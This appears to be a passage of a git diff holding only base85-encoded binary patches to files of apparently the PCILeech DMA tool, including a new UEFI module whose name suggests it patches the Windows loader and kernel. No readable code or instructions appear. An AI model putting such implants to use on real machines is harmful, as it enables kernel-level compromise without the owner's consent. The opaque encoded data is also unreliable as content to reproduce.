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
JsrI$y{{r<@$mjq7

diff --git a/pcileech_files/uefi_textout.ksh b/pcileech_files/uefi_textout.ksh
index 3e628b2d656683ff046e40f4d1f04cdac47809ff..63002a79c294063b544c022df2fb575101537cf8 100644
GIT binary patch
delta 550
zcmX@i+Qn{bF8s#Eia)d7PU*7sBjdMsnsQQ)XkXWpShQ(^M{?bkhS*H5JVpix@MVI~
zF9acU%0x%yi2*DVQyS~Lk9c%O2zYcBNO*KsD1>_SuCVy`|G!7$n*%^S#<!2Vs3?Gd
zNB2)4Qzg{Z&C{dTMI`~q(NJ&=^YrL!y#Tbuqc?PeM{gqo3j+gCM#o3NEyzN`qt{18
z!KeE?P{hFBS0TWI-}MBLZQ|_d<LaY*63Dc06?gVf1Tt(ucJvlAcEqSSIPPF(WSCsY
zs9w*>zy>s$`CM8jlSgk5laKbX(q}%sU<-{eflT*!A@CpQ*v@tZpkqB+50u7xSk6}f
zx~D|iqZ_Qwr@P$%<i73`9^KP5fUN%k7Eq~O&cMI`O8gJd@aS&00I9M*=E3iD%)|Od
zu^3R17TjkbMI0W?_g-K3>7Anj3K`GtXbI2mVg=9cY7Nis$CLjuHrJP?re(&Lq*j#V
zmzF4S`4^OA=I0eFXyk(#i8-293JP2xX)6WYVg(xzOQ9rRp`a);uf$G)t02EP6Qlzu
zYoK7LplhgLQxOjov{TSEQn0CnFuC$dbCXhw6!Oy)ib_F-r=+GOmgbb$8fsc`E9e?4
M*gzCap2%bb03xHe3jhEB

delta 349
zcmeBTKg?=tF8s!3O70$qTe?fEqUY>OtW#~TlAqgBZ!UGr<iwU4{0-^9rZO@>z<(%X
zmLP<mGSN|aVgSp;l*anb7!`p~kKQ#Z4*&lD_h@``fQf;@qx<G@7Zn8{0Lr+iBmg-o
zu5O+R9-XZhfF}9$x^D33ZDe3!U;xT!xQ2Q9G*~cr^!lhM_;g<e3h5|#`YCwuyPg2D
z4V?V_LwvL^0+}WX!LC6-+9J%;+0}6;Gtj8xye=v>!HNnBX+UuYg~`>7>Zx1|Y(OXc
zKbYp&$>7`Tz~tHdlCkuOPcPVR<4YiWJYGor2fDViSpnqQ)&r%Ay#dZ1-Cz|S-6#GB
zXuvqVp&P&g93I_sRBnJ&Hy#0bak4j4v!HIVf=x+kMM-=~etbbuW?sqU2xcPyk6v~?

diff --git a/pcileech_files/uefi_winload_ntos_patch.ksh b/pcileech_files/uefi_winload_ntos_patch.ksh
new file mode 100644
index 0000000000000000000000000000000000000000..15c49f06958d18114453a38b22f0e0cdc22c5ad2
GIT binary patch
literal 20319
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
